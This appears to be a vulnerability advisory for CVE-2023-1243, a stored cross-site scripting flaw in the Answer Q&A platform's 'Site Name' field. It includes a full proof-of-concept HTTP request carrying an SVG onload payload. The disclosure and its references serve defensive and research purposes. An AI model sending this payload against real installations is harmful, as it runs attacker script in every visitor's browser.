CVE-2023-1243 – Answer
Stored XSS
answer has a feature to customize the “Site Name” during installation or in the settings page , due to a bad sanitization it allows to put arbitrary html code which allows to execute javascript code.
Everytime a user enter in the website, the xss is triggered.
POC – Proof of concept
POST /installation/base-info HTTP/1.1
Host: localhost:9080
Content-Length: 175
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/install
Accept-Encoding: gzip, deflate
Connection: close
{"lang":"en_US","site_name":"\"><svg onload=alert(1)//","site_url":"http://localhost:9080","contact_email":"[email protected]","name":"admin","password":"admin","email":"[email protected]"}PAYLOAD: "><svg onload=alert(1)//Impact
The impact is JavaScript Code Execution. However, admin privileges are required to edit the vulnerable input fields.
Severity
https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
Reference
https://nvd.nist.gov/vuln/detail/CVE-2023-1243
https://huntr.dev/bounties/1d62d35a-b096-4b76-a021-347c3f1c570c/
https://github.com/answerdev/answer